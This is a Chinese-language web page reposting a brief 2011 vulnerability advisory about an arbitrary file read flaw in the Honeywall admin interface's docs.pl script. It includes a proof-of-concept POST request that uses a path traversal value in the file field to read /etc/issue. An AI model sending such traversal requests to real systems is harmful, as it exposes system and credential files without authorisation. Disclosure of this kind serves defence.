Php文档 Php问答行业资讯 Php论坛 Php手册 Php博客

游戏榜单

软件榜单

关闭导航

热搜榜

热门下载

热门标签

php爱好者> php文档>Honeywall后台管理界面存在任意文件读取漏洞

Honeywall后台管理界面存在任意文件读取漏洞

时间：2011-04-20 来源：cnyouker

发布日期：2011-04.19
发布作者：cnyouker

漏洞类型：任意文件遍历/下载
漏洞描述：Honeywall后台管理界面存在任意文件读取漏洞

详细说明：

admin/docs.pl 对于 POST的file检查不严。可以自己构造post包来读取任意文件。

漏洞证明：

http://xxx.xxx.xxx/admin/docs.pl
POST-content:
act=16&file=../../../../../../../../etc/issue&submit=Submit

标签分类：

相关阅读更多 +

什么是网络爬虫网络爬虫是干嘛的网络爬虫的原理和应用领域 php教程 2025-05-29
CSS中margin-top属性的含义 margin-top用法 php教程 2025-05-29
CSS中margin-top属性的含义 margin-top用法 php教程 2025-05-29
CSS中margin-top、padding-top和top的区别 php教程 2025-05-29
zhudongfangyu.exe是什么程序?如何关掉? php教程 2025-05-29

排行榜更多 +

幣安BNB币行情神器

幣安BNB币行情神器

金融理财下载

愤怒的火柴人4中文版下载

愤怒的火柴人4中文版下载

角色扮演下载

嘟嘟脸恶作剧手游下载

嘟嘟脸恶作剧手游下载

休闲益智下载

4
掘地求升2(困难攀岩)下载手机版
135.82MB · 90℃

1970-01-01

下载
5
嘟嘟脸恶作剧台服手游下载
213.76MB · 90℃

1970-01-01

下载
6
毒药试吃员手机版下载
506.93MB · 91℃

1970-01-01

下载